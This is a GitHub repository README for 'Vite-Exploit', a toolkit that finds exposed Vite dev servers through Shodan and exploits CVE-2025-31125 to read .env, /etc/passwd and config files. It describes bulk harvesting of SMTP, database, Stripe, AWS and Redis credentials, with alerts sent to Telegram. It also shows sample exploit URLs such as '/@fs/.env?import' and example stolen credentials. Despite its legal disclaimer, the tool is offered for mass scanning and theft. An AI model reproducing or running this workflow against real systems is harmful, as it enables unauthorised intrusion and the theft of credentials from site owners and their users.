Skip to content

khadafigans/Vite-Exploit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

18 Commits
README.md
README.md
 
 
main.py
main.py
 
 
requirements.txt
requirements.txt
 
 
vue.py
vue.py
 
 

Repository files navigation

🔐 Vite/Vue JS Exploitation Toolkit

This toolkit contains two Python scripts for identifying and exploiting Laravel applications with exposed .env files and vulnerable APP_KEYs.

Screenshots Grabber

Screenshots Exploit

🧾 Script 1: main.py

📌 Purpose: Finds exposed Vite dev servers on the internet using advanced Shodan queries, with support for country and custom filtering. Also provides domain/IP conversion utilities for pentesters and bug bounty researchers.

🛠 How It Works:

  • Uses a wide set of Vite fingerprinting queries to search Shodan.
  • Supports country code and custom Shodan filter input.
  • Saves hostnames and IPs in organized, timestamped folders.
  • Converts domain lists to IPs.
  • Performs reverse IP lookups (IP to domain).

📥 Usage:

  1. Prepare your Shodan API key and edit the script to insert it.

  2. Run the script: python main.py

  3. Choose an option:

  • Grab Hostname/Domain from Shodan (with filters)
  • Domain to IP
  • IP to Domain (Reverse IP)
  1. Follow the prompts for input files and filters.

📁 Output:

  • Shodan results saved in: ResultGrabVite/[COUNTRY]/ResultHost_YYYYMMDD-HHMMSS.txt ResultGrabVite/[COUNTRY]/ResultIP_YYYYMMDD-HHMMSS.txt
  • Domain to IP results: ResultDomainToIPVite/DomainToIP_YYYYMMDD-HHMMSS.txt
  • IP to Domain results: ResultIPToDomainVite/IPToDomain_YYYYMMDD-HHMMSS.txt

📦 Dependencies:

  • shodan
  • colorama
  • requests

Install with: pip install -r requirements.txt

🧾 Script 2: vue.py

📌 Purpose: Exploits Vite CVE-2025-31125 to read sensitive files (like .env, /etc/passwd, config files) from exposed Vite dev servers. Automatically extracts and categorizes secrets for pentesting and bug bounty work.

🛠 How It Works:

  • Reads a list of targets (one per line, with or without protocol).
  • Attempts to read a wide range of sensitive files via the Vite dev server file read vulnerability.
  • Stops after the first .env found per target for efficiency.
  • Parses .env and config files for:
    • SMTP credentials (SES, Sendgrid, Mailgun, Office365, 1And1, Zoho, Mandrill, etc.)
    • Database credentials (phpMyAdmin, Adminer, etc.)
    • Stripe, Twilio, AWS, Redis, App Keys, and more.
  • Send notification to Telegram
  • Saves each type of secret to its own result file in a timestamped folder.

📥 Usage:

  1. Prepare a file (e.g., targets.txt) with one target per line (domain or IP).

  2. Run the script: python vue.py

  3. Enter the input filename when prompted

📁 Output:

  • All successful file reads: ResultsVite_YYYYMMDD_HHMMSS/found.txt
  • Extracted secrets: ResultsVite_YYYYMMDD_HHMMSS/SMTP.txt ResultsVite_YYYYMMDD_HHMMSS/Database.txt ResultsVite_YYYYMMDD_HHMMSS/Stripe.txt ResultsVite_YYYYMMDD_HHMMSS/Twilio.txt ResultsVite_YYYYMMDD_HHMMSS/AWS.txt ResultsVite_YYYYMMDD_HHMMSS/Redis.txt ResultsVite_YYYYMMDD_HHMMSS/AppKey.txt

📦 Dependencies:

  • requests
  • colorama

Install with: pip install -r requirements.txt

📁 Folder Structure

Organize your data in the following folder structure:

vite-js-grabber/
│
├── vite-grabber.py         # Main grabber script (Shodan recon, domain/IP tools)
├── vue.py                  # Main exploit script (CVE-2025-31125 file reader & extractor)
├── requirements.txt        # Python dependencies
│
├── ResultGrabVite/         # Shodan grab results (auto-created)
│   └── [COUNTRY]/ResultHost_YYYYMMDD-HHMMSS.txt
│   └── [COUNTRY]/ResultIP_YYYYMMDD-HHMMSS.txt
│
├── ResultDomainToIPVite/   # Domain to IP conversion results
│   └── DomainToIP_YYYYMMDD-HHMMSS.txt
│
├── ResultIPToDomainVite/   # IP to domain (reverse IP) results
│   └── IPToDomain_YYYYMMDD-HHMMSS.txt
│
├── ResultsVite_YYYYMMDD_HHMMSS/   # Exploit results (auto-created per run)
│   ├── found.txt           # All successful file reads
│   ├── SMTP.txt            # Extracted SMTP credentials
│   ├── Database.txt        # Extracted DB credentials
│   ├── Stripe.txt          # Stripe keys
│   ├── Twilio.txt          # Twilio keys
│   ├── AWS.txt             # AWS keys
│   ├── Redis.txt           # Redis info
│   └── AppKey.txt          # Laravel/Vite app keys
│
└── README.md               # This file

Sample Results in Telegram BOT

- 🔥 Vite Exploit Found!
	- http://172-234-151-170.ip.linodeusercontent.com/@fs/.env?import

- 🔥 Interesting File Found
	- http://172-234-151-170.ip.linodeusercontent.com/@fs/etc/passwd?import

- 📧 SMTP Credentials Found
	- URL: http://172-234-151-170.ip.linodeusercontent.com/@fs/.env?import
	- MAIL_HOST: smtp.mailgun.org
	- MAIL_USER: [email protected]
	- MAIL_PASS: supersecretpassword
	- MAIL_FROM: [email protected]
	- MAIL_PORT: 587

- 🗄️ Database Credentials Found
	- URL: http://172-234-151-170.ip.linodeusercontent.com/@fs/.env?import
	- DB_HOST: 127.0.0.1
	- DB_USER: root
	- DB_PASS: dbpassword
	- DB_NAME: mydb
	- DB_PORT: 3306
	- DB_CONNECTION: mysql

⚠️ Legal Disclaimer: These tools are for authorized penetration testing and educational purposes only. Unauthorized use is illegal and unethical. Always obtain explicit permission before testing any system.

🧾 Requirements Summary (for both scripts)

Create a requirements.txt file with: requests urllib3 colorama

Then install: pip install -r requirements.txt

👨‍💻 Author: Bob Marley

Buy me a Coffe :

If you find this project useful and want to support future development:

₿  BTC: 17sbbeTzDMP4aMELVbLW78Rcsj4CDRBiZh
₮  USDT: TQfx5kjY4d1Q6piDgBVL31d8YJ8xCx5uTd (TRC-20)
Ξ  ETH: 0xb88cdeba793e13fa39ee19ad34cfe69916b81fa0 (ERC-20)
Ł  LTC: LffRsEacPDGmFGQESpnSSRTECRxXq4txPq


©2025 Bob Marley

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

3 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages